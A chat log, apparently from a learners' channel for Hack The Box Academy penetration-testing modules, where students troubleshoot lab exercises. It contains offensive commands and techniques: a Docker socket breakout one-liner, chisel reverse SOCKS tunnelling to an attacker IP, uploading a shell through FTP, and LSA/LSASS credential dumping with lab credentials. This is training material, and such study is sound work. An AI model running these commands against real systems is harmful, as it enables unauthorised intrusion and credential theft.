#modules
hmmm i will have to look into this plugin, thx
change the FILEPATH
Morning, I'm working through the Password Attacks module and am stuck on the Linux Credential Hunting where I need to find Will's password. I saw the hint about another user, but I've spent a few evenings trying to brute force FTP & SSH with the password.list the hint referenced to no avail. Any ideas what I'm doing wrong?
└──╼ $netexec winrm 10.129.42.197 -u user.list -p password.list
┌─[aesliex@parrot]─[~]
└──╼ $
why isn't my netexec thing working
winrm probably isn't running
either way don't try to bruteforce winrm, it's slow af
the question is asking me to: "Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."
pentest path, password attacks, network services
how can I do it in another way? I'm kinda new lol
crackmapexec and I think I used a password list from SecLists
oh that section
crackmapexec isn't working for me, someone here told me to use netexec as it's newer and better
@rocky mist
yeah you have to use winrm then, are you connected to the vpn?
yepp im connected
Bummer, that's what I used
reset the target, something should show up when you run the command
netexec is just cme but better
Attacking Common Services - Easy
what is the other way in? i used the mysql one
tried to poke at the ftp server but didn't find anything
mysql, ftp and the webserver are the only things needed
I logged in to the ftp server but got Entering Extended Passive Mode (|||53455|) when listing
i used smtp to mysql
the ftp server is also on http
which means?
have u logged on the http ftp?
sorry for the tag, can I ask how you figured out how to change the codeblock text color? I can only change the inline text color, but not the code block text color, no matter what color I choose it stays the same
how?
the ftp server only has two files
i think they are talking about what you just said
text color as in you want syntax highlighting?
u got an idea now?
shell?
upload shell to the ftp server
and execute it over the web app

huh, not taught in the module but it's a good way
like the photos above, not sure why it's not changing default codeblocks text to black, but it can change the background to light grey
now what is the rdp doing?
idek
where is the text in the codeblock
that's the point :), it's too grey to decipher when it should be black instead
i just use the default, which theme are you using ?
minimal theme has many themes
yeah I use minimal
installed minimal, and no change
guess I have to troubleshoot from a default obsidian install, maybe there is something conflicting
install and activate it, then change the color scheme
yeah, what I did, installed minimal selected it, tried to change the color again
Hey
Module: Linux Privilege Escalation
Section: Docker
Link to section: https://academy.hackthebox.com/module/51/section/2411
Found this section to be a little confusing. So, the only exploit discussed in this section is the final command?
||docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash||
If someone could provide some additional explanation I'd appreciate it.
I'm doing the exploiting web vulnerabilities thick client section; there we have creds to log on to a fatty client jar app using the creds given, but I can't log in even after I did as mentioned in the section
this article helped me fill in the gaps where the module did not provide enough information
https://juggernaut-sec.com/docker-breakout-lpe/
I just threw that command in chatgpt and it helped me
Anybody working on the XSS module? I am working on the phishing exercise. I test my payload and it works, but when I send it to the validation page it says invalid URL. What is the criteria to validate the URL? Thank you
I don’t remember the module explaining the commands tbh
Did u send the url in the box?
I tried that, gave a little insight, but didn't quite explain the gaps in the module.
I'll give it a read, thanks.
Ur mounting the host's / directory to the /mnt directory in the container
Pivot, Tunneling and Port Forwarding Module - SKILLS ASSESSMENT :
- Question 6: "For your next hop, list the networks and then use a common remote access solution to pivot. Send the C:\Flag.txt located on the workstation"
I'm performing a network scan but only find IP addresses 15 and 35; am I doing something wrong? And I imagine that I have to look for a username and password to pivot, but I get lost because I can't find the password as such. I appreciate it if someone helps me
Chroot changes the container's / directory to /mnt so it's automatically in the host's /
I'm at the Windows section under "setting up" and I'm confused on how to set up the Windows VM after downloading the zip file for VMware. Can anyone help me out?
Dump creds
Btw I've not gone through the article yet but based on my understanding so far, I basically need to have the following requirements to be able to exploit this?
- Current user should be part of the docker group.
- There should be a docker image present on the machine.
- I should have elevated privileges over a docker.sock file (I find this file(s) using the find command or with LinPEAS?)
The condition is one of the below, not both:
- you are part of the docker group
- there is a docker socket file over which you have write privilege
Then to exploit it:
- there is an image already present and you can use that for exploitation
- you transfer a container image to the target and import it into docker (docker load -i ubuntu-image.tar) (if there is no image)
?
Got it, thanks!
What's the privesc technique called?
hmmm, I have it my notes as "Docker Membership Priv Esc", not sure if it has a specific name
Any help? I can't seem to log in to the jar file using the creds given in the exploiting web vulnerability in thick client section
Did u switch the port?
Yss
Hey guys any idea why it's not working?
And recompiled it?
I don't understand the error?
What module
file transfer
I uploaded the zipped file on the target but I can't connect to it rn with rdp to unzip it and take the hash
Try restarting it
still not working
I already did a full port scan but only 22 and 80 are open
worked fine for me
hey guys, the Attacking Common Services "Attacking FTP" has no port open
anyone faced that issue?
maybe u need to switch vpn servers
keep restarting and scanning
if the machine lags when u scan, u will miss it
its there, the machine is just really laggy
Alright
mb it was a linux system not windows so rdp was not working here
it was with ssh
I'm working through the Password Attacks module and am stuck on the Linux Credential Hunting where I need to find Will's password. I saw the hint about another user, but I've spent a few evenings trying to brute force FTP & SSH with the password.list the hint referenced to no avail. Any ideas what I'm doing wrong?
try making a mutated list of the hinted password
Ahh, I was thinking of doing that, thank you!
yeah idk why they hid a core part of the question in the hint
Question on sqlmap "What's the Kimberly user's password? (Case #1)". I got the answer by dumping everything and using grep. Was there a non-grep method I missed? I know we can search for specific table and column names, but can we search for specific values like a user name?
Module: [Active Directory Enumeration & Attacks]
Chapter: [AD Enumeration & Attacks - Skills Assessment Part I]
Question: [Submit the contents of the flag.txt file on the Administrator desktop on MS01]
hello,
How can I make a pivot? I tried with ligolo and chisel (bind and reverse), but it doesn't work.
Maybe I can give more explanation in DM
sqlmap has options for that like --tables, --columns, etc
in linux privilege escalation > privileged groups, I found the flag but for some reason it's telling me it's incorrect
not sure how possible it is, but can someone confirm the flag i got is the actual flag?
wym pivot, isn't ms01 the first machine u get access to?
nevermind, just got it
two identical flags but one had a special character and i thought i had to exclude it
Any nudge on the Skills Assessment lab of the Windows lateral movement lab?
for some reason I'm mega stuck on AD skills assessment 1 Find cleartext credentials for another domain user.
I can get the NTLM hash for tp****** user using lsassy with nxc, and pth with nxc to auth as that user, but I feel like I'm missing something from the module. I'm starting to go down various rabbit holes but feel like I'm missing something extremely simple
yes, I have initial access via a webshell on this machine, but I want to access the 172.16.0.0/16 with my linux machine
that's not clear text
yeah, I know. that's why I'm posting here.
what's wrong with ligolo or any other pivot tool?
did u run a reverse shell through the web one?
2. On the attacking system:
./chisel server --socks5 --reverse -p 8000
3. On the target system:
.\chisel.exe client $attackerip:8000 R:socks
you should be able to communicate with MS01 after that
did u try mimikatz
Because it's technically possible to get it without the hint though it takes a while
no, I execute chisel directly in the webshell
I'll try that
yeah, but still was only really able to get an ntlm hash. I'm trying to go back through my notes and see what other ways of dumping cleartext creds were covered, but I feel like it's right in front of my face and I'm just ignorant
is mimikatz for sure the correct path for getting the cleartext password it's looking for?
The first targets to go for when finding clear text creds after SYSTEM access
SAM Db
LSASS process memory dump
Dpapi + Browser creds
Files found on system
But to get clear text you’ll have to crack the NTLM hashes in Sam db
yeah I'm clearly doing something slightly wrong, I've checked lsa / dpapi with mimikatz + nxc
the NTLM isn't crackable with rockyou (and probably isn't the intended way to get the password it's expecting)
I went and checked sysvol/powershell history/some program file directories because that seemed to be another place to check for cleartext creds
maybe I need to just bang my head against the box a little more
Even then it depends on which submodule you use in mimikatz
Iirc there's lsadump::sam which requires admin
There's a hacktricks page that has them listed
hey all, I am struggling with this question on the Windows Cmd Line Skills Assessment. I am able to see all the "flag.txt" files but not entirely sure which has the flag in it because there are tons.
"User4 has a lot of files and folders in their Documents folder. The flag can be found within one of them."
Well you might want to learn about recursion then
gci [get-ChildItem] in powershell
Since all but the actual flag one is empty you'll only receive output for the flag :]
If you're sure the format is HTB{..} you can pipe the output to "Select-String" (powershell's grep)
Is it possible for bloodhound to miss information about an AD environment? I guess it depends on what domain user you're running as, right?
Doesn't really depend on the user run as, as it's a bunch of ldap queries
But it can miss some stuff
@nova ginkgo let's not reveal contents of the AEN module as many do it blind, since the module itself is the walkthrough
I suggest using a larger list
I've done some poking around, but do you know why
And using filters
Fixed yet?
the ldap query for w/e reason just didn't return anything or was slow to return for whatever reason ¯\_(ツ)_/¯
May I dm you about this? I do not want to spam the chat about my question lol
Sorry I'm gonna be busy soon
Given what came out of today's AMA, are there any plans to offer an "ICS Penetration Tester" role path and associated certification? After all, attacks on industrial control systems can cause far more damage than attacks on anything else, so it follows that this is where the most demand lies.
I gave you a powershell command you can look into
Not sure, doesn't look like it atm though
Also the AMA coincides with the new Alchemy prolab
yupp
New question: it doesn't work here, any help? I can't use unzip and gunzip is the hint I received
can you tell me the first letter?
I don't have my notes open. But you should know how to filter ffuf results at this stage
If not, then your notes suck
I filtered with -fs 15157
@gilded lion ?
Yeah, I don't know what is going on but I just get a "'Get-ChildItem' is not recognized as an internal or external command, operable program or batch file." while in the Windows terminal
Because it's a powershell command, not CMD
There's also findstr
But findstr can be clunky (since it's built for CMD)
Anyone ^^
I just add -ac, is that correct?
Yeah it's for [a]uto [c]alibration
Yeah
Not in the near future…. We are focussing on other specialisation areas.
Well it looks like you're trying to unzip the windows zip file on a linux target my guy
Just from a base observation
the suffix is .z
but it worked an hour ago?
? Well I'm sure the file you need to extract on the linux host is not the "win_upload.zip"
Mb upload_win.zip
not working too, it says unknown suffix
🤦
the file is upload_nix.zip
Second unzip should be on that host no?
unzip wasn't on the host I remember
same problem, that's why I tried both ^^
no it's not and I have no rights to install it
Oh just unzip it on your host and transfer
Oh the hint tells you exactly what to do with gunzip btw
But it helps to use the right file
^
I can't bcs the hash is not the same ^^
still no response
Use a bigger list then idk
it's just weird bcs with scp upload everything worked fine, I'm just trying other ways
try transferring with scp or wget @tender nimbus
I used
yeah already did, but I'm trying other things, that's why I don't understand why it doesn't work
Why would the text hash not be the same?
??
if it's not the same hash then my answer on the question
You ran the hasher command on it yeah? Weird then if there's some difference
The zip and txt file will have different hashes ofc
@fathom pendant
I think it's because you use -o instead of -O
Oh okay wait, there is a problem with the file? when I download it on my host it becomes the _win and not the _nix?
I suggest if you're truly stuck at this early stage;
Read the section
Because you're clicking the wrong download link?
I clicked the link from that section and download the upload_nix.zip just fine
okay now it worked, sorry that was weird
Maybe some cache error
Yeah maybe, but still can't unzip it, srsly I'm gonna try again with scp
But in this case I would have to perform the sam dump and bring the data to my attacking machine to do the decryption?
weird, with scp it works but not if I run my own server on my machine
What I'm trying to do is move the files to my local machine to do the decryption and I do it with smbserver.py
I want to know if I need to transfer the Mimikatz tool or this is the way to use it within the Pivot Host
This hacking when you are learning is a headache jejejje
Learning anything is a headache, that's your brain working :p
It's hard to break out of "only one true method"
You will generally fall into a method that's the easiest or simplest to do for you
But knowing multiple tools for the same goal is helpful
I think that in order to move the files as it does not reach my attacking host then there is where I am like stuck because I don't know if I have to move them to the point of support
Pivoting is a helpful skill to know
port forwarding
If I have the ideas organized: I have to dump LSASS, but I need to transfer that to my attacking machine to be able to decrypt it and be able to enter RDP from the pivot host to the other machine with the information it finds. Is it something like this?
How does one report a typo in a module?
figured it out, mimikatz may work for some but didn't for me. just tinkered with netexec a bit.
Just create a new post?
I believe yes
just state the module name in the title, and tell where the typo is in the content
Thanks!
XPath - Data Exfiltration (Exercises)
Why does GET /index.php?q=ave&f=full+|+//* work - prints all the data
Why does GET /index.php?q=ave&f=full+|+/*/* not work - prints just 3 <br>
in returning the data in the XML doc
I think the question is more about the regex for f= (the GET is just before in his message, I assume he messed up the code quote)
hi
I'm struggling with Firewall and IDS/IPS Evasion - Hard Lab in Nmap. Can't find the flag requested
You will need to ask a more specific issue to get an answer (haven't done this module yet so it won't be me, but many helpful people around will nudge you in the right direction if you describe your struggle)
"Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer."
also why I can't send the screen
Not what HaTxx meant. Provide more details on what you've tried without posting spoilers
Network Enumeration with Nmap Module. I tried different nmap scans to find the version of services but can't find any flag that they are requesting
full+|+//* This query will select all elements at all levels
full+|+/*/* This query will select all elements that are children of the root's children.
So in this case it will not return the deeper elements like <fullstreetname>, <streetname>, or <street_type>, because those are nested further inside <street>, which is beyond the two-level depth that full+|+/*/* is targeting.
I mean I found port 22 and 80 and the relative version of services running on them. BUT any answer submitted results incorrect
I've not done the module, so here is a question: What service the client was talking about?
thanks for clarifying 🙂
See #welcome and follow the instructions
No worries, I don't understand what the question is about yet, but I know typos when I see them 🤣
Turns out I actually did that module, I got confused with the IDS Evasion part.
All you need to solve that lab is in the page before all three labs.
Literally go through the page one by one and see if that leads somewhere.
Appreciate the help
I am currently working on Footprinting > IMAP/POP3. I am currently trying to figure out the admin email address. I have tried:
- ||sudo nmap <target> -sV -p110,143,993,995 -sC||
- ||openssl s_client -connect <target>:imaps||
  - ||Running commands inside of the connection||
However, the only email address I have been able to find is ||cto.dev@dev.inlanefreight.htb|| (which is not correct)
Are you sure? I tried but nothing 
Hi
I am currently working on the Linux Fundamentals. At one point I need to count how many services are listening on the target system on all interfaces (not on localhost and IPv4 only)
Spoiler on the answer, be careful if you are working on that
||I wanted to use netstat as taught and was getting 10 as an answer but it was wrong. When I checked some forums they told me to use ss instead of netstat.||
||Could someone explain to me why ss, which is supposed to replace netstat, is not getting the same answer?||
||For reference this is what I used: ss -l -4 | grep -v "127.0.0" | grep "LISTEN" | wc -l instead of netstat -l -4 | grep -v "127.0.0" | grep "LISTEN" | wc -l||
There are probably more ports open than 22 and 80.
Here's a pretty good resource:
https://www.atmail.com/blog/imap-commands/
Yeah, I have read this a few times, but have not been able to replicate anything useful. Is there a specific section that may be of use? All of the commands which they recommend turn out to not be accessible on the connection
You can DM what you have tried.
basically everything they suggest
don't think so. I spent the last 4 days reading & trying again and again but NOTHING
Like someone said earlier, everything you need is in that final section.
is there anyone who finished this module Stack-Based Buffer Overflows on Linux x86?
yes I just realised that you need to ncat that stupid thing 
Thank you!
In Misc CSRF Exploitation, I’m struggling to get this one working.
- gobuster does not find any subdomains as mentioned
- the app stays on the profile only a few seconds then logs out. By the time I deliver the payload the app has logged out.
frankly I just used netcat to navigate the imap/pop3 server in that module
for the username enumeration I think nmap has a script to try all the different methods
I'm doing the Attacking Common Services - Easy lab. I found both the user and its password but can't connect to mysql; I get this error: ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
there is an interesting command flag there try that
if that can get you through with that.
within mysql command ?
right
hero
worked?
yup I had to google it and find the flag needed to use s***-***
but yes good work
you should have grepped it
found many commands about it so I had to google the error to find out about it
hi guys im new here
I'm a student and interested in learning cyber security, can y'all help
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@wheat meadow use this ☝️
Hi, a new student here

Starting at the beginning with Cracking into HTB, curl inlanefreight.com is failing. Do I need to be connected to the VPN for it to work or is that just a completely made up website name?
that's a real website you can visit
weird, guess I had a typo when I tried XD
hi I'm stuck on the Attacking SAM section of the Password Attacks Module. I'm specifically stuck on the 3rd question. I'm gonna try again tomorrow but would it be a bad idea to look at a walkthrough of it up until the third question? Would it be possible for me to get a hint tomorrow if I'm still stuck? I don't want to be stuck on this one section for several weeks. I still want to get it obviously.
What do you recommend because I still want to learn?
you should just post where you're stuck at
Ok. I will try again tomorrow because I think I'm missing some stuff but tomorrow I will try the whole thing again and post where I am stuck at.
When it gets to that point
it's mainly on the third question, if you look at the last major thing the section teaches
The Remote Dumping and LSA Secrets Considerations part
I do it but it won't get me the result I want
I kind of played with it a lot
ok but the question itself tells us nothing about where YOU are stuck
you haven't said what you've tried, where you can't get past, etc
so like i said before.. just say what you're stuck on
ok I need to do it again to tell you so tomorrow morning I'm gonna do it again and then tell you where I'm stuck
on the pivoting module I am trying to do the RDP Socks Tunneling with SocksOverRDP section with chisel instead. I have a chisel client and server set up and connected. But I cannot for the life of me get an rdp session from my attacker box. Have proxychains set up to use the proper local port. Any suggestions?
for all we know you're trying to dump SAM by going to the bathroom
yes
that's exactly right
no but seriously, I think I want to try again when I'm focused and can make a good attempt and give you a good in depth report of everything I've tried
and why I'm stuck as well, because I think that it would take actual focus to explain
On my attack box I set up chisel by "./chisel_1.7.6_linux_amd64 client -v 10.129.6.89:1234 socks"; on the windows pivot box I have ".\chisel_1.10.0_windows_amd64 server -v -p 1234 --socks5", but when I use "proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123" from my attack box it doesn't connect
I just read the question.. it's literally the command it gives you to dump lsa..
yes I know but that command isn't working in my case
I try the exact command and I don't get results or I'm not accessing the results properly
alright well come back with more info then because 'not working' doesn't tell us anything
for example, maybe it's not working because your keyboard isn't plugged in
we have no starting point to know where you're at by just telling us 'i need help'
Ok. I will try tonight possibly if not I'll go through the whole thing again tomorrow
actually I'm gonna try to get it over with right now so I can show you
looks like you're using two different versions of chisel? use the same version for both server and client maybe
that way I can show you what's going on
one is running on windows and the other is running on linux
yes but the files names indicate they are two different versions of chisel. i'm saying use the binary from the same release.
I gotcha. True. I'll give it a shot
now it's not letting me RDP into it. I have RDP'd into it in the past:
┌─[us-academy-1]─[10.10.14.27]─[htb-ac-605555@htb-a5lessvu94]─[~]
└──╼ [★]$ sudo xfreerdp /v:10.129.202.137 /u:htb-student /p:HTB_@cademy_stdnt!
Authorization required, but no authorization protocol specified
[20:46:06:642] [9015:9015] [ERROR][com.freerdp.client.x11] - failed to open display: :1
[20:46:06:643] [9015:9015] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
Is it just me or is the linux fundamentals module not beginner friendly?
so should I just reset target or Pwnbox?
You get asked questions that aren’t covered in the stuff you are taught
you probably need to wrap the password in single quotes because of the special characters, specifically the exclamation mark.
┌─[us-academy-1]─[10.10.14.27]─[htb-ac-605555@htb-a5lessvu94]─[~]
└──╼ [★]$ sudo xfreerdp /v:10.129.26.27 /u:Bob /p:'HTB_@cademy_stdnt!'
Authorization required, but no authorization protocol specified
[20:49:00:081] [13531:13531] [ERROR][com.freerdp.client.x11] - failed to open display: :1
[20:49:00:081] [13531:13531] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
still won't work even after I reset target
this is for the Attacking SAM section of Password Attacks Module
you don't need sudo for xfreerdp btw
Why are you trying to rdp with elevated rights?
because with regular xfreerdp it gave me a similar error
hold on let me try something
got it working the rdp
now I'm gonna try the next step
I ran the command they showed in the module and was able to do it np
so I ran the command
and here's what showed up
┌─[us-academy-1]─[10.10.14.27]─[htb-ac-605555@htb-wuloikg0dj]─[~/Documents]
└──╼ [★]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --lsa
[*] First time use detected
[*] Creating home directory structure
[*] Creating missing folder logs
[*] Creating missing folder modules
[*] Creating missing folder protocols
[*] Creating missing folder workspaces
[*] Creating missing folder obfuscated_scripts
[*] Creating missing folder screenshots
[*] Creating default workspace
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Initializing SSH protocol database
[*] Initializing VNC protocol database
[*] Initializing WMI protocol database
[*] Initializing FTP protocol database
[*] Initializing RDP protocol database
[*] Copying default configuration file
So it might have worked but then where do I get cracked username and password?
see my issue? same thing for the other variation on the command
that's what I'm having issues with
that's the main thing
quotes being wrapped around special characters is a linux thing, not just a xfreerdp thing.
ok
you need to do it every single time you're trying to input a literal string.
ok
but then it shows this:
┌─[us-academy-1]─[10.10.14.27]─[htb-ac-605555@htb-wuloikg0dj]─[~/Documents]
└──╼ [★]$ crackmapexec smb 10.129.42.198 --local-auth -u 'bob' -p 'HTB_@cademy_stdnt!' --lsa
and nothing after that
where is the data stored then?
so going through the module, curl https://inlanefreight.com should print out some sort of error, but when I run it nothing prints out. I don't have the -s flag and confirmed curl http works
it should display on your screen, and cme stores data in the .cme folder
it's not displaying on my screen
even when I do it in single quotes and capitalize Bob
like first letter of Bob
try https://www.inlanefreight.com instead of just inlanefreight.com
the only time I've seen CME not return results is when it can't connect to the target, from what I recall
you can also try nxc, which is the successor to cme
well now that returned actual html with no warning
wait I changed target IP which I did earlier but it may have worked this time hold on a sec
so it worked then
@htb[/htb]$ curl https://inlanefreight.com
curl: (60) SSL certificate problem: Invalid certificate chain
More details here: https://curl.haxx.se/docs/sslcerts.html
...SNIP...
but the example says I should get this
you can't just copy and paste from the module directly, you need to use the target IP given to you
well it worked but I don't think it was supposed to?
I know
what section is this in
Web Requests - Hypertext Transfer Protocol Secure (HTTPS)
part of the Cracking into HTB
I got flag
ez
minor thing I was not figuring out ya
I believe that is just an example and it doesn't reflect the actual server, because the actual server doesn't have an invalid cert

is there any way to find a https:// web page that has an invalid cert?
no, but you can search for other websites. like https://expired.badssl.com/
yeah I tried googling but just got a bunch of articles on what it means xd, but okay cool
Has anyone done the blind sql injection module?😅
Plenty of people have, just ask your question
I have been stuck at the time based data extraction section. With the Python script I don't understand why, when I get the result and submit it, the flag is not true whether I set the delay time to 1, 2, 3, or 4 s. Can anyone give me hints? I guess the problem is at the oracle function.
Try to run it from a pwnbox
Oh wait that’s the blind sql injection module. Didn’t have this issue there tbh
If it's a timed attack you might want to try to run it a couple of times, see if there are any different outcomes. Also make sure you don't have any trailing white space.
I have tried running it many times in the last 3 days and it always flags the send as wrong. I wonder if there is something wrong with the script?
Flags as in different flags each time?
Yes.
Exactly what I said then, run it multiple times, and figure out the common parts of the string.
weird
You also might have better luck from the pwnbox as I'd expect it might have a more stable connection to the spawned instance.
maybe using a longer timeout will help
I see the longest time is 4s. If I set the delay time greater than 4s, by the time the lab ended I still hadn't gotten the flag.
You can add time to your lab
ah, I see, thank you.
Feel free to dm me your code and I’ll have a look
Yeah, I sent you my code, Please check it.
@limber river I set the delay time to 5s, I will see how the result is.
good luck
I got flag thank you so much everyone
you should remove those creds from your post, it's revealing info from the skill assessment you don't need to reveal
👍
I am doing the Windows Priv Esc module at the SeTakeOwnershipPrivilege lesson. In the lab my whoami /priv does not even have SeTakeOwnershipPrivilege. How am I supposed to do this lab?
Remove this
and have you really checked for what you actually got the credentials for?
or you just saw the credentials and applied it?
altho same creds are going to get used twice.
can anyone help me with this? still can't figure it out. I've reverted a few times but htb-student still has no SeTakeOwnershipPriv, I can't edit GPO either.
https://academy.hackthebox.com/module/67/section/631 SeDebugPrivilege What am I doing wrong?
the script updated, try looking at the source. PS> ImpersonateFromParentPid -ppid <parentpid> -command <command to execute> -cmdargs <command arguments>
Lets goo
where can I ask for help on networking? I'm new guys
Yes, I coped with the last one, a new problem appeared.
0x00000002
ERROR_FILE_NOT_FOUND
The system cannot find the file specified.
statically compile it or grab one from the repo release page
run as admin
Hi guys, for the Footprinting medium lab I keep getting permission denied, any reason why
Please give more information, like what have you tried, show the commands etc, more information you provide the more people can help
I can't attach images for some reason
showmount -e 10.129.135.131
Export list for 10.129.135.131:
/TechSupport (everyone)
mkdir target-NFS
sudo mount -t nfs 10.129.135.131:/TechSupport/ ./target-NFS/ -o nolock
cd target-NFS/
bash: cd: target-NFS/: Permission denied
Htb-ac
When mounting I have sudo
yes
Thank you, I switched to root user and it worked, crazy how I didn't think of that before
issue must be related to latest build vs old build of chisel
i see you got the answer already
https://academy.hackthebox.com/module/67/section/642 Why don't I have access?
thanks!
run as admin
I run
run cmd as admin
hey, I'm in Password Attacks trying to do Network Services to get the flag from the user victim, but the dir command doesn't work
I can't upload an image for the problem
So you've identified the flag?
I'm on the user victim machine now
after I get the user name and the password i do "evil-winrm -i <target-IP> -u <username> -p <password>"
And it is an excellent aspect that I can't write anything
warning: remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
this is the problem
that's just a warning, won't affect you sending commands
yes but the command line doesn't work
why not? just type something and send it
First of all, thank you for helping me, but it is important to note that the problems I encounter will always be strange
if you see that warning that means you're connected to the winrm shell
That's right, I logged in, and then I have to go into the file to remove the flag, the problem is that the commands don't work
Can you send me a screenshot via DM
ok
I tried to go to the john folder, it doesn't do anything
are you doing the security fundamentals path? I think you should be starting there, and start from the beginning
Also images that have spoiler information, i.e., the answer shouldn't be shared, which is why I said to DM a screenshot.
I did.
you seem to be unable to do basic file system traversal and are missing a key understanding of file system hierarchy and such, though? what would lead you to believe the flag would be in one dir, then when you don't find it, not know to look elsewhere? I think you should start over. unless this is a troll.
I'm new here, for next time, how can I send DM?
You can just click on my username in this chat and type the message there. I will then have to accept it. Be sure not to DM without permission. I have already said you can.
I appreciate your response, but I have no problem with Linux commands. The purpose of the picture I sent was to show that the most basic command does not return a response; in the same vein, I tried many more attempts.
But like exciton said, if you don't understand how to move around a file system, it is recommended to get those basics down first.
ok
look we're here to help but you need to get real about where you're at with your approach. very fundamental skills missing.
It did produce a response.
can you link us to the module? i think i know the one you're doing.
I am running through that section for funsies and it works. The flag is where it would normally be.
you did "dir"?
ok I don't have access to that one. best of luck, you'll get it sorted. the normal location should be something to note when you do find it. also, since you're in PowerShell, consider using the Get-ChildItem cmdlet to search the system for a flag.txt or whatever the lab tells you it's called.
make note of where "normal" locations are so you can just keep that in the back of your head for later labs
Eh, there are a few ways of displaying the flag, but yeah I changed directories to where the flag was and used dir to identify its existence.
@scarlet tundra man Get-ChildItem or check the msdocs page, look for the examples that searches the entire filesystem, it seems like you're close.
Do most of y'all pair a module or concept with a box? I've been ignoring this in an attempt to force feed myself info as fast as possible... answering questions though (sometimes) helps to reinforce the info... or at least makes me think I know what I'm talking about
@gray yacht ^
and anyone else currently active for that matter.
wondering about ways to solidify the info and not have it forgotten as soon as the next module is begun, but balance that against a continuing effort to learn/retain info (I need this stuff learned, quickly)
practice does help but the assessments in modules are sufficient for the most part
oh that's a good point, I should probably return to them and redo after a few days/week just to double check
ok so I'm doing the session attacks assessment, this is kind of a trivial assessment but I'm being lazy. does anyone know if I HAVE to run a fuzz to enum valid emails first.last@example.com or is there a "better" approach? (easier)
I honestly use the same methodology to process each one, which really drives home my process. So instead of just jumping to something that I know is where I need to be, I still run nmap and search for directories, etc.
I did it, thanks
Good job!
what is the intended for Attacking Common Services - Medium?
Hey, I'm in the exploiting web vulnerabilities in thick client part. I try to download a fatty server jar file onto the system at a point in the exercise but I get this error
Any help
I can't upgrade to a fully interactive shell, anyone?
python3 -c 'import pty; pty.spawn("/bin/bash")'
Ctrl + z
stty raw -echo
fg
reset
did but it didn't work
didn't enter reset, let me try
terminal type?
xterm-256color probably
depends on your terminal but if you are not into weird ricing / distros it's xterm-256color
indeed it is! I am learning, not a pro
oh shit now I get it, I copied that word "probably" too
yeah xd
it happens xd
I don't have my notes this second for that, but I don't recall having to do that.
I've rewritten this message 3 times now 😄
Yeah those were the things I was going to suggest.
for now i think the intended way is to use rustscan
I wouldn't, it misses ports left and right. Also, would you mind removing your replies as they are a bit spoiler-ish
yeah sure
same issue here, were you able to solve it?
https://academy.hackthebox.com/module/67/section/603 Should I have done it in another way or did I do something wrong?
If you changed permissions you'll need to log out and back in
do you mean disconnect? or shutdown /l in console?
No, logoff or shutdown /l
Through the console works thank you.
Despite the fact that I have been using Windows console commands for a very long time, unlike Linux, I do not know them; you need to learn 😦
Instead of pinging someone from two months ago it would be better to just ask your question.
Hi everyone,
a few months ago I completed the SSRF section of the server-side attacks module and really enjoyed the content and labs. I would like to go back to refresh those techniques, especially the use cases in SSRF Exploitation Example and Blind SSRF, however the module has been completely updated. Therefore I would like to ask, is there a possibility to access the old contents of the module?
Sadly no, but you can leave feedback with /feedback in discord.
thanks man
Hello, I waited about 1 hour for spawning but it is still spawning, why?
Attacking Common Applications : PRTG Network Monitor
Try a different VPN server
Hello, I am stuck on the skills assessment for Understanding Log Sources & Investigating with Splunk: "find through SPL searches against all data the process that started the infection. Answer format: _.exe". I found the answer already to the previous question that asks for "the process that created remote threads in rundll32.exe". Steps taken so far: used the previous executable identified and pulled the destination IP and source IP previously identified, created a table with the messages field and went through all the executables. No luck there. Tried filtering for the previous day and first day the previous executable was found and used "exe" to try and identify any suspicious exe events in that time period. Also tried a query involving EventID=1 | table _time ComputerName ParentImage ParentCommandLine ParentProcessId Image CommandLine ProcessId to try and identify process creations, with no luck. Currently stumped, does anyone have any hints/advice they can give to put me on the right track?
Help me pls
Attack the PRTG target and gain remote code execution. Submit the contents of the flag.txt file on the administrator Desktop.
Attacking Common Applications : PRTG Network Monitor
I did what I learned but
─(forever㉿kali)-[~]
└─$ sudo crackmapexec smb 10.129.x.x -u prtgadm1 -p 'Pwn3d_by_PRTG!'
SMB 10.129.216.158 445 APP03 [*] Windows 10 / Server 2019 Build 17763 x64 (name:APP03) (domain:APP03) (signing:False) (SMBv1:False)
SMB 10.129.216.158 445 APP03 [-] APP03\prtgadm1:Pwn3d_by_PRTG! STATUS_LOGON_FAILURE
@fathom pendant
Active Directory Penetration Tester Path > Using CrackMapExec > LDAP and RDP Enumeration > Question 3
https://academy.hackthebox.com/module/84/section/811
I'm entering the correct answer but it's not accepted as correct.
sounds like it's not correct then. I just checked, it's not correct.
Ohai SuperNuts
hello
pls guys
It is correct....
no it's not
did you enumerate yourself?
Yes
look at the samaccountname then, that's what it's looking for
there's a big difference between a user account and a computer account
Copy that
Is there a way to gift a learning path to someone or only gift cards?
Cube gift cards*

never mind
no, because that's illegal
i think it's obvious you want to do something malicious so we aren't going to help you
He’s gone
great now he's going to hack you instead
That’s okay
no it isn't, you didn't give permission
As a matter of fact, you’re right.
Better start a defensive course now
totally not an alt guys
lol what the heck
Okay one moment lol
hi guys, is there any problem with the academy? I have an issue with spawning targets
I just tried to spawn a random machine and it worked for me
try ctrl + shift + r then spawn again
I tried to refresh before
now this worked but how!!!
I wasted 5 hours today :<
because it's a hard refresh that clears the cache and completely redownloads the page
normal refresh doesn't clear the cache
nice thank u
now don't use hard refresh to hack donald trump without permission
try password in single quotation marks '
can you ping the target
what module and did you just reset it
ok when did you click spawn now
how long was it before you spawned the target and ran that command
try with remmina
ok then it's most likely because you changed VPNs.
despawn the target, disconnect from the vpn, re-download the vpn file, reconnect to the vpn, hard refresh the section (ctrl shift r) then respawn the target
then wait ~3-5 mins for the environment to spawn
Hey, I'm in the exploiting web vulns in thick client section and I'm trying to rebuild a jar file after I edited something in it, but I'm getting an error. anybody knows what to do?
